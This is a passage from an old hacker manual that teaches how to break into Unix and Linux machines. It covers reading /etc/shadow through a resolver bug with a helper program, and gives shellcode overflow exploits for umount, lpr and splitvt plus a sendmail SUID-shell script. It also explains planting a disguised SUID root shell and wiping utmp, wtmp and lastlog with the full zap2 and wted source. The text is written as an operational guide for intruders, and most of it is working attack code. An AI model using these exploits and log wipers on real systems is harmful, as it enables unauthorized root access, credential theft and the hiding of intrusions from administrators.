  2250.              fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
  2251.              fflush(stdout);
  2252.            }
  2253.          }
  2254.       }
  2255.    }
  2256. }
  2257. !
  2258.    echo "Creating scrack"
  2259.    cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
  2260. fi
  2261.  
  2262. ./scrack /tmp/messages.dict.$$
  2263.  
  2264. echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.
  2265.  
  2266. ------ cut here
  2267.  
  2268. -----------------------
  2269. Section 3B
  2270. Newbe's
  2271. -----------------------
  2272.  
  2273. Yup, again, just another place to get password files.  Just follow the guide
  2274. lines in section 2B.  Use your sly ideas and get out there and make some
  2275. lame friends ;)
  2276.  
  2277. Remember you could have been a lammer before you read this manual <G>rin
  2278.  
  2279. -----------------------------
  2280. Section 3C
  2281. Getting shadow passwd files
  2282. -----------------------------
  2283.  
  2284. What is a shadow password file?
  2285.  
  2286. Lets just use the passwd file above to show you what it would look like to you
  2287. if you cat it.
  2288.  
  2289. root:x:0:0:root:/root:/bin/bash
  2290. bin:x:1:1:bin:/bin:
  2291. daemon:x:2:2:daemon:/sbin:
  2292. adm:x:3:4:adm:/var/adm:
  2293. lp:x:4:7:lp:/var/spool/lpd:
  2294. sync:x:5:0:sync:/sbin:/bin/sync
  2295. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2296. halt:x:7:0:halt:/sbin:/sbin/halt
  2297. mail:x:8:12:mail:/var/spool/mail:
  2298. news:x:9:13:news:/usr/lib/news:
  2299. uucp:x:10:14:uucp:/var/spool/uucppublic:
  2300. operator:x:11:0:operator:/root:/bin/bash
  2301. games:x:12:100:games:/usr/games:
  2302. man:x:13:15:man:/usr/man:
  2303. postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
  2304. nobody:x:-2:100:nobody:/dev/null:
  2305. ftp:x:404:1::/home/ftp:/bin/bash
  2306. guest:x:405:100:guest:/dev/null:/dev/null
  2307. bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
  2308. web:x:502:100:Web Master:/home/web:/bin/bash
  2309. mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash
  2310.  
  2311. Something missing?  Yup, the encrypted passwords.  If you get root access the
  2312. encrypted passwords are in /etc/shadow.  Some admin's will hide the shadow file
  2313. in some weird directory somewhere, but most of the time you will find it right
  2314. in /etc.  Other shadow programs might put it in a master.passwd file.  But if
  2315. you get root just have a good look around.
  2316.  
  2317. Lets say you have an account on the machine and just can't get root access.
  2318.  
  2319. Not a problem if they are using libc 5.4.7, at this time most still are ;)
  2320. Also one of these files have to have suid perm's (no prob):
  2321.  
  2322. ping, traceroute, rlogin, or, ssh
  2323.  
  2324. 1. Type bash or sh to start a bash shell
  2325. 2. Type: export RESOLV_HOST_CONF=/etc/shadow
  2326. 3. Type one of the file names above with asdf, like this:
  2327.  
  2328. ping asdf
  2329.  
  2330. It should cat the passwd shadow file for you if it works.
  2331. I seem to find it working on most of the systems i am going on these days.
  2332.  
  2333. Note: you can replace /etc/shadow with any root owned file you want to read.
  2334.  
  2335. Here is a quick script you can run on any file you want to make it easy:
  2336.  
  2337. rcb.c
  2338. -------- cut here
  2339.  
  2340. /* RCB Phraser - therapy in '96
  2341.  * Limits: Linux only, no binary files.
  2342.  * little personal message to the world: FUCK CENSORSHIP!
  2343.  */
  2344.  
  2345. #include <stdio.h>
  2346.  
  2347. void getjunk(const char *filetocat)
  2348. { setenv("RESOLV_HOST_CONF",filetocat,1);
  2349.   system("ping xy 1> /dev/null 2> phrasing");
  2350.   unsetenv("RESOLV_HOST_CONF");
  2351. }
  2352.  
  2353. void main(argc,argv)
  2354. int argc; char **argv;
  2355. { char buffer[200];
  2356.   char *gag;
  2357.   FILE *devel;
  2358.   
  2359.   if((argc==1) || !(strcmp(argv[1],"-h")) || !(strcmp(argv[1],"--help")))
  2360.   { printf("RCB Phraser - junked by THERAPY\n\n");
  2361.     printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0]);
  2362.     exit(1);
  2363.   }
  2364.   getjunk(argv[1]);
  2365.   gag=buffer;
  2366.   gag+=10;
  2367.   devel=fopen("phrasing","rb");
  2368.   while(!feof(devel))
  2369.   { fgets(buffer,sizeof(buffer),devel);
  2370.     if(strlen(buffer)>24)
  2371.     { strcpy(buffer+strlen(buffer)-24,"\n");
  2372.       fputs(gag,stdout);
  2373.     }
  2374.   }
  2375.   fclose(devel);
  2376.   remove("phrasing");
  2377. }
  2378.  
  2379. -------------- cut here
  2380.  
  2381. command line : rcb /etc/shadow  or any other file on the system you
  2382. can't read ;)
  2383.  
  2384. --------------------
  2385. Section 3D
  2386. Getting /etc/hosts
  2387. --------------------
  2388.  
  2389. Just a precaution, sometimes you will need to know what other systems
  2390. are in the hosts file, or what are all of the ip addresses or different domains
  2391. on the system.  Make sure to cat the /etc/hosts file for more information
  2392. you might need later.
  2393.  
  2394. --------------------------
  2395. Chapter IV
  2396. Getting the root account
  2397. --------------------------
  2398. Like I said before all you need is one account in most cases, if you cannot get
  2399. root on the system you might want to trade it off to some irc junkie that
  2400. just wants to load a bot, for some other account or info that can help you in
  2401. your hacking quest.  There will be enough information here so that if you can't
  2402. get root access, their system is well kept and probably will be kept up in the
  2403. future.  You can always lay the account on the side, put the info in some kind
  2404. of log file with some good notes so that you can come back at a later time,
  2405. like right when a new exploit comes out ;)
  2406.  
  2407. Try to stay out of the system until that time so that you do not risk loosing
  2408. the account.  Remember that when you login to an account and can't get root
  2409. you will not be able to clean the logs, and the next time the user logs in he
  2410. might see a message that says: last login from xxx.com time:0:00 date:xx/xx/xx
  2411.  
  2412. ------------
  2413. Section 4A
  2414. Bugs
  2415. ------------
  2416.  
  2417. There are many bugs out there in different programs that you can use to get
  2418. root.  It might be a game installed on the system, or even the sendmail
  2419. program.  If they do not update their programs on a regular basis, you can
  2420. be sure you will be able to get in now, and if not, soon to come.
  2421.  
  2422. I will be sure to provide the main exploits and bugs here and other less
  2423. used below in the appendix section.  I will make sure here to give you detailed
  2424. english terms so that you can exploit root on the system.  But please be sure
  2425. to read the sections below, and this manual entirely before proceeding, to be
  2426. sure you get started in the right way and not blow you chances of having a
  2427. long stay on the system.
  2428.  
  2429. ------------
  2430. Section 4B
  2431. Exploits
  2432. ------------
  2433.  
  2434. umount/mount exploit
  2435.  
  2436. Look in the /bin directory for a file called umount (or mount),
  2437. if you do not find it there do a search for the file like this:
  2438.  
  2439. find / -name umount -print -xdev
  2440.  
  2441. (you can look for any other file name the same way)
  2442.  
  2443. Go to the directory where the file is and do: ls -al um*
  2444.  
  2445. If the file has suid perm's you can probably get root.
  2446.  
  2447. SUID perm's has the rws for the owner of the file which is root.  What you are
  2448. looking for is the (s)
  2449.  
  2450. Look here:
  2451.  
  2452. victim:/bin# ls -al um*
  2453. -rwsr-sr-x   1 root         8888 Mar 21  1995 umount
  2454. victim:/bin#
  2455.  
  2456. This machine we can get root by a compile on the file below:
  2457.  
  2458. umount.c
  2459. ------ cut here
  2460.  
  2461. /* sno.c : Linux realpath exploit
  2462.  * Syntax: ./sno N
  2463.  *         mount $WOOT 
  2464.  *    OR  umount $WOOT
  2465.  * N is some number which seems to differ between 4 & 8, if your number is
  2466.  * too big, you will get a mount error, if it is too small, it will seg
  2467.  * fault.  Figure it out.  (Sometimes N=0 for mount)
  2468.  * If you use mount, first thing to do once you get the root shell is rm 
  2469.  * /etc/mtab~, if this file exists you can't root with mount until it is 
  2470.  * removed.
  2471.  * 
  2472.  *
  2473.  *                                          -ReDragon
  2474.  */
  2475. #define SIZE 1024
  2476.  
  2477.    long get_esp(void)
  2478.    {
  2479.    __asm__("movl %esp,%eax\n");
  2480.    }
  2481.  
  2482.    main(int argc, char **argv)
  2483.    {
  2484.    char env[SIZE+4+1]; /* 1024 buffer + 4 byte return address + null byte */
  2485.    int a,r;
  2486.    char *ptr;
  2487.    long *addr_ptr;
  2488.    char execshell[] =
  2489.    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  2490.    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  2491.    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  2492.    char *exec_ptr = execshell;
  2493.  
  2494.    r=atoi(argv[1]);  
  2495.    ptr = env;
  2496.    memcpy(ptr,"WOOT=",5); /* set environment variable to use */
  2497.    ptr += 5;              
  2498.  
  2499.    for(a=0;a<SIZE+4-strlen(execshell)-r;a++)  /* pad front with NOPs */
  2500.       *(ptr++) = 0x90;
  2501.    while (*exec_ptr)
  2502.       *(ptr++) = *(exec_ptr++);
  2503.    addr_ptr = (long *)ptr;
  2504.    *(addr_ptr++) = get_esp()+1139;  /* 0xbffffc01 */
  2505.  
  2506.    ptr = (char *) addr_ptr;  
  2507.    *ptr = 0; /* must end with null byte to terminate string */
  2508.    putenv(env);
  2509.    system("/bin/mount $WOOT");
  2510. }
  2511.  
  2512. ----------- cut here
  2513.  
  2514. **********************************
  2515. To compile the file on the victims machine type gcc umount.c (or what ever
  2516. name you called it) -o um
  2517.  
  2518. This will make a file called um that you can exec.  Sometimes you will need
  2519. to put a ./ in front of the file like this: ./um
  2520.  
  2521. With this exploit you might also have to give it a number like:
  2522. ./um 0 (or) ./um 4 ....alltheway up to 8... like this again ./um 8
  2523.  
  2524.  
  2525. *************************************
  2526. If you fail here you might want to try lpr.  Look in the /usr/bin for lpr and
  2527. see if it is SUID, if it is lpr should work if it is up on the system.
  2528.  
  2529. ls -l lpr
  2530.  
  2531. Ok it had suid perm's?  Use this script
  2532.  
  2533. *************************************
  2534. lpr.linux.c
  2535. ------------- cut here
  2536.  
  2537. #include <stdio.h>
  2538. #include <stdlib.h>
  2539. #include <unistd.h>
  2540.  
  2541. #define DEFAULT_OFFSET          50
  2542. #define BUFFER_SIZE             1023
  2543.  
  2544. long get_esp(void)
  2545. {
  2546.    __asm__("movl %esp,%eax\n");
  2547. }
  2548.  
  2549. void main()
  2550. {
  2551.    char *buff = NULL;
  2552.    unsigned long *addr_ptr = NULL;
  2553.    char *ptr = NULL;
  2554.  
  2555.    u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
  2556.                         "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
  2557.                         "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
  2558.                         "\xd7\xff\xff\xff/bin/sh";
  2559.    int i;
  2560.  
  2561.    buff = malloc(4096);
  2562.    if(!buff)
  2563.    {
  2564.       printf("can't allocate memory\n");
  2565.       exit(0);
  2566.    }
  2567.    ptr = buff;
  2568.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  2569.    ptr += BUFFER_SIZE-strlen(execshell);
  2570.    for(i=0;i < strlen(execshell);i++)
  2571.       *(ptr++) = execshell[i];
  2572.    addr_ptr = (long *)ptr;
  2573.    for(i=0;i<2;i++)
  2574.       *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
  2575.    ptr = (char *)addr_ptr;
  2576.    *ptr = 0;
  2577.    execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
  2578. }
  2579. ---------- cut here
  2580.  
  2581. ***************************
  2582. Here is the BSD version
  2583. ***************************
  2584.  
  2585. lpr.bsd.c
  2586. --------------------------------------------------------- cut here
  2587. #include <stdio.h>
  2588. #include <stdlib.h>
  2589. #include <unistd.h>
  2590.  
  2591. #define DEFAULT_OFFSET          50
  2592. #define BUFFER_SIZE             1023
  2593.  
  2594. long get_esp(void)
  2595. {
  2596.    __asm__("movl %esp,%eax\n");
  2597. }
  2598.  
  2599. void main()
  2600. {
  2601.    char *buff = NULL;
  2602.    unsigned long *addr_ptr = NULL;
  2603.    char *ptr = NULL;
  2604.  
  2605.    char execshell[] =
  2606.    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
  2607.    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
  2608.    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
  2609.    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
  2610.  
  2611.    int i;
  2612.  
  2613.    buff = malloc(4096);
  2614.    if(!buff)
  2615.    {
  2616.       printf("can't allocate memory\n");
  2617.       exit(0);
  2618.    }
  2619.    ptr = buff;
  2620.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  2621.    ptr += BUFFER_SIZE-strlen(execshell);
  2622.    for(i=0;i < strlen(execshell);i++)
  2623.       *(ptr++) = execshell[i];
  2624.    addr_ptr = (long *)ptr;
  2625.    for(i=0;i<2;i++)
  2626.       *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
  2627.    ptr = (char *)addr_ptr;
  2628.    *ptr = 0;
  2629.    execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
  2630. }
  2631. --------- cut here
  2632.  
  2633. Now just compile it and chmod it +x, and run it.
  2634.  
  2635. Watch this one on the group file owner.  Any file you copy will have
  2636. group owner as lp, make sure you chgrp root filename on any file you
  2637. write.  Always be watching the user groups with ls -l and if you changed
  2638. any change them back like this:
  2639.  
  2640. chgrp groupname filename
  2641.  
  2642. It is a good idea to use this exploit ONLY to get the root access, then
  2643. just copy bash or sh to another file name on the system somewhere and make
  2644. it root root, suid:  Group owner and File owner root, then chmod it +s
  2645.  
  2646. This will give you root access in the future as gid and uid root, without using
  2647. the lp group.  Make sure you name it something that looks like it should be
  2648. running as a root process somewhere ;)
  2649.  
  2650. *****************
  2651. Here is another that is still around after a while, look for SUID perm's
  2652. on a file /usr/bin/splitvt
  2653.  
  2654. If it has suid perm's use this file below, but be sure to read the directions
  2655. after the exploit:
  2656. ****************************************
  2657. sp.c
  2658. -------------------------------------------- cut here
  2659. /*
  2660.  *            Avalon Security Research
  2661.  *                Release 1.3
  2662.  *                 (splitvt)
  2663.  *
  2664.  * Affected Program: splitvt(1)
  2665.  *
  2666.  * Affected Operating Systems: Linux 2-3.X
  2667.  *
  2668.  * Exploitation Result: Local users can obtain superuser privileges.
  2669.  *
  2670.  * Bug Synopsis: A stack overflow exists via user defined unbounds checked
  2671.  * user supplied data sent to a sprintf(). 
  2672.  *
  2673.  * Syntax: 
  2674.  * crimson~$ cc -o sp sp.c
  2675.  * crimson~$ sp
  2676.  * bash$ sp
  2677.  * bash$ splitvt
  2678.  * bash# whoami
  2679.  * root
  2680.  *
  2681.  * Credit: Full credit for this bug (both the research and the code)
  2682.  * goes to Dave G. & Vic M.  Any questions should be directed to
  2683.  * mcpheea@cadvision.com . 
  2684.  *
  2685.  * ----------------------------------------------------------------------------
  2686.  */
  2687.  
  2688.  
  2689. long get_esp(void)
  2690. {
  2691. __asm__("movl %esp,%eax\n");
  2692. }
  2693. main()
  2694. {
  2695.   char eggplant[2048];
  2696.   int a;
  2697.   char *egg;
  2698.   long *egg2;
  2699.   char realegg[] =
  2700. "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  2701. "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  2702. "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  2703.   char *eggie = realegg;
  2704.  
  2705.   egg = eggplant;
  2706.  
  2707.   *(egg++) = 'H';
  2708.   *(egg++) = 'O';
  2709.   *(egg++) = 'M';
  2710.   *(egg++) = 'E';
  2711.   *(egg++) = '=';
  2712.  
  2713.   egg2 = (long *)egg;
  2714.  
  2715.   for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
  2716.  
  2717.   egg=(char *)egg2;
  2718.  
  2719.   for (a=0;a<0x40;a++) *(egg++) = 0x90;
  2720.  
  2721.   while (*eggie)
  2722.     *(egg++) = *(eggie++);
  2723.   *egg = 0; /* terminate eggplant! */
  2724.  
  2725.   putenv(eggplant);
  2726.  
  2727.   system("/bin/bash");
  2728. }
  2729.  
  2730. -------------- cut here
  2731.  
  2732. Ok this is how splitvt works:
  2733.  
  2734. 1. Compile the file
  2735. 2. Run the sp file
  2736. 3. Run splitvt
  2737.  
  2738. Before you run the file:   whoami {press enter}
  2739.                            username
  2740. After you run the exploit: whoami
  2741.                            root
  2742.  
  2743. *******************************************************
  2744.  
  2745. Now if all of these have not got you root, try sm.sh.  This is a sendmail
  2746. bug that works with 8.73 to 8.83 (maybe some others)
  2747.  
  2748. Here is the script:
  2749.  
  2750. sm.sh
  2751. ---------- cut here
  2752. echo   'main()                                                '>>smtpd.c
  2753. echo   '{                                                     '>>smtpd.c
  2754. echo   '  setuid(0); setgid(0);                               '>>smtpd.c
  2755. echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
  2756. echo   '}                                                     '>>smtpd.c
  2757. echo   'main()                                                '>>leshka.c
  2758. echo   '{                                                     '>>leshka.c
  2759. echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
  2760. echo   '}                                                     '>>leshka.c
  2761.  
  2762. cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
  2763. ./leshka
  2764. kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
  2765. rm leshka.c leshka smtpd.c /tmp/smtpd
  2766. cd /tmp
  2767. sh
  2768. ------------ cut here
  2769.  
  2770. Just chmod the file +x like this
  2771.  
  2772. chmod +x sm.sh
  2773.  
  2774. 1. Run the file
  2775. 2. It will take you to the /tmp directory
  2776. 3. type ls -l and see if you have a SUID sh file there, if you do, type
  2777.    whoami, if not root, run the file ./sh, now see if you are root ;)
  2778.  
  2779. I will add many more scripts in the appendix, but these should be the best
  2780. at this time to get root access on linux or BSD, if you need another BSD
  2781. exploit try the crontab exploit for BSD in the appendix.
  2782. ****************************************************************************
  2783.  
  2784. --------------------------
  2785. Chapter V
  2786. Making yourself invisible
  2787. --------------------------
  2788.  
  2789. The whole point of this hacking stuff is that you continue to have access to as
  2790. many points of information as possible.  If you do stupid things, of fail just
  2791. once to clean your utmp or wtmp, xferlog's, etc ... you can loose access to the
  2792. system.  Make yourself a regular order to follow and learn each system well!
  2793.  
  2794. Become part of the system, and take many notes if you are doing many systems
  2795. at once.  But remember make yourself a routine.  Have your set routine of
  2796. taking your time to clean any presence of your login, transfers, etc.  Do NOT fail
  2797. in this one thing or you will loose access and possibly face some sort of
  2798. charges.
  2799.  
  2800. ----------------------------
  2801. Section 5A
  2802. Zap2 (for wtmp/lastlog/utmp)
  2803. ----------------------------
  2804.  
  2805. There are different log cleaning programs out there, but the best of these
  2806. is zap2.  I compile mine to be named z2.
  2807.  
  2808. z2 will be run right after you get root access.  This will want to be one of
  2809. the fastest things you run.  (you never know)
  2810.  
  2811. You might want to do a finger @host.xxx to see who is on now, look at the idle
  2812. time of root or admin accounts to see if they are away doing something.
  2813.  
  2814. Login, and as soon as you get on, type w, to see idle time and who is on, but
  2815. at the same time you are looking at that be typing your root access command
  2816. that you should have waiting somewhere nested in the system.  As soon as you
  2817. get your root access, type ./z2 username-u-logged-in-as
  2818.  
  2819. Now you are safer then you were.  Do a w or who command to see that you are
  2820. gone from the utmp.  If you ftp, or do other things you might have to use
  2821. other programs I will include in the next section called wted and lled.
  2822.  
  2823. Lets finish with this z2 first.  You will have to see where each file is in
  2824. the system and edit z2.c to include the right location of these files
  2825.  
  2826. Here is the area you will look for right at the top of the file:
  2827.  
  2828. #define WTMP_NAME "/usr/adm/wtmp"
  2829. #define UTMP_NAME "/etc/utmp"
  2830. #define LASTLOG_NAME "/usr/adm/lastlog"
  2831.  
  2832. Most of the systems I login to are:
  2833.  
  2834. #define WTMP_NAME "/var/adm/wtmp"
  2835. #define UTMP_NAME "/var/adm/utmp"
  2836. #define LASTLOG_NAME "/var/adm/lastlog"
  2837.  
  2838.  
  2839. But you do your own look around to see were the files are.  Also /var/log:
  2840. is a regular location.
  2841.  
  2842. Add the log locations for each system, compile the file, and you are all ready
  2843. to be invisible right after the login using z2
  2844.  
  2845. Here is the .c file
  2846.  
  2847. z2.c
  2848. --------------------------- cut here
  2849. #include <sys/types.h>
  2850. #include <stdio.h>
  2851. #include <unistd.h>
  2852. #include <sys/file.h>
  2853. #include <fcntl.h>
  2854. #include <utmp.h>
  2855. #include <pwd.h>
  2856. #include <lastlog.h>
  2857. #define WTMP_NAME "/usr/adm/wtmp"
  2858. #define UTMP_NAME "/etc/utmp"
  2859. #define LASTLOG_NAME "/usr/adm/lastlog"
  2860.  
  2861. int f;
  2862.  
  2863. void kill_utmp(who)
  2864. char *who;
  2865. {
  2866.     struct utmp utmp_ent;
  2867.  
  2868.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  2869.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  2870.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  2871.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  2872.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  2873.                  write (f, &utmp_ent, sizeof (utmp_ent));
  2874.             }
  2875.      close(f);
  2876.   }
  2877. }
  2878.  
  2879. void kill_wtmp(who)
  2880. char *who;
  2881. {
  2882.     struct utmp utmp_ent;
  2883.     long pos;
  2884.  
  2885.     pos = 1L;
  2886.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  2887.  
  2888.      while(pos != -1L) {
  2889.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  2890.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  2891.           pos = -1L;
  2892.         } else {
  2893.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  2894.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  2895.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  2896.                write (f, &utmp_ent, sizeof (utmp_ent));
  2897.                pos = -1L;
  2898.           } else pos += 1L;
  2899.         }
  2900.      }
  2901.      close(f);
  2902.   }
  2903. }
  2904.  
  2905. void kill_lastlog(who)
  2906. char *who;
  2907. {
  2908.     struct passwd *pwd;
  2909.     struct lastlog newll;
  2910.  
  2911.      if ((pwd=getpwnam(who))!=NULL) {
  2912.  
  2913.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  2914.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  2915.             bzero((char *)&newll,sizeof( newll ));
  2916.             write(f, (char *)&newll, sizeof( newll ));
  2917.             close(f);
  2918.         }
  2919.  
  2920.     } else printf("%s: ?\n",who);
  2921. }
  2922.  
  2923. main(argc,argv)
  2924. int argc;
  2925. char *argv[];
  2926. {
  2927.     if (argc==2) {
  2928.         kill_lastlog(argv[1]);
  2929.         kill_wtmp(argv[1]);
  2930.         kill_utmp(argv[1]);
  2931.         printf("Zap2!\n");
  2932.     } else
  2933.     printf("Error.\n");
  2934. }
  2935. --------------------------- cut here
  2936.  
  2937. ---------------
  2938. Section 5B
  2939. Other scripts
  2940. ---------------
  2941.  
  2942. Now we come to the other part of this.  Lets say that after you login, and do
  2943. your z2, you need to ftp in to grab a file. (remember NEVER ftp or telnet out)
  2944. Ok, you ftp in and grab a few files, or login to another account on the system,
  2945. now you will need to use wted.  wted will let you edit the wtmp to remove your
  2946. login from the ftp.  You also might need to use the lled (lastlog edit).
  2947.  
  2948. Here is the menu if you type ./wted, after setting log locations & compile:
  2949.  
  2950. [8:25pm][/home/compile]wted
  2951. Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
  2952.             -h      This help
  2953.             -f      Use FILE instead of default
  2954.             -a      Show all entries found
  2955.             -u      Show all entries for USER
  2956.             -b      Show NULL entries
  2957.             -e      Erase USER completely
  2958.             -c      Erase all connections containing HOST
  2959.             -z      Show ZAP'd entries
  2960.             -x      Attempt to remove ZAP'd entries completely
  2961.  
  2962. So if i ftp to username tsmith I would type wted -x -e tsmith
  2963.  
  2964. The program will now prompt you one login at a time for the user tsmith asking
  2965. if you want to delete it.  After you delete your login, make sure to
  2966. chmod 644 the wtmp.tmp file and then copy it over the top of the wtmp file in
  2967. the log directory.  Like this:
  2968.  
  2969. 1. chmod 644 wtmp.tmp
  2970. 2. cp wtmp.tmp /var/adm/wtmp
  2971.  
  2972. Here is your wted program:
  2973.  
  2974. MAKE SURE TO HAVE THE RIGHT PATH TO THE char file below
  2975. So make sure you have the right path to the wtmp file.
  2976.  
  2977. wted.c
  2978. ---------------------- cut here
  2979. #include <stdio.h>
  2980. #include <utmp.h>
  2981. #include <time.h>
  2982. #include <fcntl.h>
  2983.  
  2984. char *file="/var/adm/wtmp";
  2985.  
  2986. main(argc,argv)
  2987. int argc;
  2988. char *argv[];
  2989. {
  2990. int i;
  2991. if (argc==1) usage();
  2992. for(i=1;i<argc;i++)
  2993.     {
  2994.     if(argv[i][0] == '-')
  2995.         {
  2996.         switch(argv[i][1])
  2997.             {
  2998.             case 'b': printents(""); break;
  2999.             case 'z': printents("Z4p"); break;
  3000.             case 'e': erase(argv[i+1],0); break;
  3001.             case 'c': erase(0,argv[i+1]); break;
  3002.             case 'f': file=argv[i+1]; break;
  3003.             case 'u': printents(argv[i+1]); break;
  3004.             case 'a': printents("*"); break;
  3005.             case 'x': remnull(argv[i+1]); break;
  3006.             default:usage();
  3007.             }
  3008.         }
  3009.     }
  3010. }
  3011.  
  3012. printents(name)
  3013. char *name;
  3014. {
  3015. struct utmp utmp,*ptr;
  3016. int fp=-1;
  3017. ptr=&utmp;
  3018. if (fp=open(file,O_RDONLY))
  3019.     {
  3020.     while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp))
  3021.         {
  3022.         if ( !(strcmp(name,ptr->ut_name)) || (name=="*") ||
  3023.         (!(strcmp("Z4p",name)) && (ptr->ut_time==0)))
  3024.             printinfo(ptr);
  3025.         }
  3026.     close(fp);
  3027.     }
  3028. }
  3029.  
  3030. printinfo(ptr)
  3031. struct utmp *ptr;
  3032. {
  3033. char tmpstr[256];
  3034. printf("%s\t",ptr->ut_name);
  3035. printf("%s\t",ptr->ut_line);
  3036. strcpy(tmpstr,ctime(&(ptr->ut_time)));
  3037. tmpstr[strlen(tmpstr)-1]='\0';
  3038. printf("%s\t",tmpstr);
  3039. printf("%s\n",ptr->ut_host);
  3040. }
  3041.  
  3042. erase(name,host)
  3043. char *name,*host;
  3044. {
  3045. int fp=-1,fd=-1,tot=0,cnt=0,n=0;
  3046. struct utmp utmp;
  3047. unsigned char c;
  3048. if (fp=open(file,O_RDONLY)) {
  3049.         fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
  3050.         while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
  3051.         if (host)
  3052.             if (strstr(utmp.ut_host,host)) tot++;
  3053.             else {cnt++;write(fd,&utmp,sizeof(struct utmp));}
  3054.         if (name) {
  3055.                 if (strcmp(utmp.ut_name,name)) {cnt++;
  3056.             write(fd,&utmp,sizeof(struct utmp));}
  3057.         else { 
  3058.             if (n>0) {
  3059.                 n--;cnt++;
  3060.                 write(fd,&utmp,sizeof(struct utmp));}
  3061.             else
  3062.             {
  3063.             printinfo(&utmp);
  3064.             printf("Erase entry (y/n/f(astforward))? ");
  3065.             c='a';
  3066.             while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
  3067.             if (c=='f') {
  3068.                 cnt++;
  3069.                 write(fd,&utmp,sizeof(struct utmp));
  3070.                 printf("Fast forward how many entries? ");
  3071.                 scanf("%d",&n);}
  3072.             if (c=='n') {
  3073.                 cnt++;
  3074.                 write(fd,&utmp,sizeof(struct utmp));
  3075.                 }
  3076.             if (c=='y') tot++;
  3077.             } 
  3078.               }    }                    
  3079.         }
  3080.         close(fp);
  3081.         close(fd);
  3082.         }
  3083. printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
  3084. printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
  3085. }
  3086.  
  3087. remnull(name)
  3088. char *name;
  3089. {
  3090. int fp=-1,fd=-1,tot=0,cnt=0,n=0;
  3091. struct utmp utmp;
  3092. if (fp=open(file,O_RDONLY)) {
  3093.         fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
  3094.         while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
  3095.         if (utmp.ut_time) {
  3096.             cnt++;
  3097.             write(fd,&utmp,sizeof(struct utmp));
  3098.         }
  3099.         else
  3100.             tot++;
  3101.     }
  3102.         close(fp);
  3103.         close(fd);
  3104.         }
  3105. printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
  3106. printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
  3107. }
  3108.  
  3109. usage()
  3110. {
  3111. printf("Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
  3112. printf("\t-h\tThis help\n");
  3113. printf("\t-f\tUse FILE instead of default\n");
  3114. printf("\t-a\tShow all entries found\n");
  3115. printf("\t-u\tShow all entries for USER\n");
  3116. printf("\t-b\tShow NULL entries\n"); 
  3117. printf("\t-e\tErase USER completely\n");
  3118. printf("\t-c\tErase all connections containing HOST\n");
  3119. printf("\t-z\tShow ZAP'd entries\n");
  3120. printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
  3121. }
  3122. ---------------------- cut here
  3123.  
